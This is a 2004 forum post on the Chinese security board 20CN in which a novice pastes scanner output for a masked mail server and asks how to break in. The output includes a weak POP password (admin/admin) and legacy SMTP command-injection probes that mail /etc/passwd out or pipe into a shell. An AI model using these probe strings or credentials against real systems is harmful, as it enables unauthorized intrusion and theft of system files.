20CN网络安全小组论坛 - 菜鸟乐园 - 【求助】已经拥有这些漏洞，如何入侵

论坛: 菜鸟乐园标题: 【求助】已经拥有这些漏洞，如何入侵

作者: jz15950148 [jz15950148]

论坛用户

我扫描的了一台机子拥有这些漏洞！我该如何运用去入侵他？
*.*.*.*

主机信息

转换失败

*.*.*.*[尚未分配]

--------------------------------------------------------------------------------

路由表

跟踪路由-> 1 Ping failed
跟踪路由-> 1 1024 ms 0 ms 0 ms 0.0.0.0 【保留地址】

--------------------------------------------------------------------------------

WEB服务信息检测

服务检测 SMTP-> 220 ESMTP on WebEasyMail [3.6.2.1] ready. http://www.51webmail.com
服务检测 POP-> +OK POP3 on WebEasyMail [3.6.2.1] ready. http://www.51webmail.com

--------------------------------------------------------------------------------

FTP匿名检测

--------------------------------------------------------------------------------

SMTP检测

检测 SMTP->*.*.*.* HELO
检测 SMTP->*.*.*.* 检测debug漏洞 502 Error: command not implemented
检测 SMTP->*.*.*.* 检测kill漏洞 502 Error: command not implemented
检测 SMTP->*.*.*.* 检测wiz漏洞 502 Error: command not implemented
检测 SMTP->*.*.*.* 检测rcpt to: /tmp/.rhosts漏洞 502 Error: command not implemented
检测 SMTP->*.*.*.* 检测+ +漏洞 502 Error: command not implemented
检测 SMTP->*.*.*.* 检测RSET漏洞 220 OK
检测 SMTP->*.*.*.* 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 501 input error.
检测 SMTP->*.*.*.* 检测RSET漏洞 220 OK
检测 SMTP->*.*.*.* 检测mail from: |tail|sh漏洞 501 input error.

--------------------------------------------------------------------------------

FINGER检测

--------------------------------------------------------------------------------

RPC检测

--------------------------------------------------------------------------------

弱口令检测

POP弱口令：admin(admin)

--------------------------------------------------------------------------------

端口检测

25 [smtp]
110 [pop3]

--------------------------------------------------------------------------------

CGI/ASP漏洞

--------------------------------------------------------------------------------

[此贴被 jz15950148(jz15950148) 在 07月11日12时39分编辑过]
【请使用关键字发贴】

[此贴被日月双星(abctm) 在 07月11日13时12分编辑过]

地主发表时间: 04-07-11 12:31

论坛: 菜鸟乐园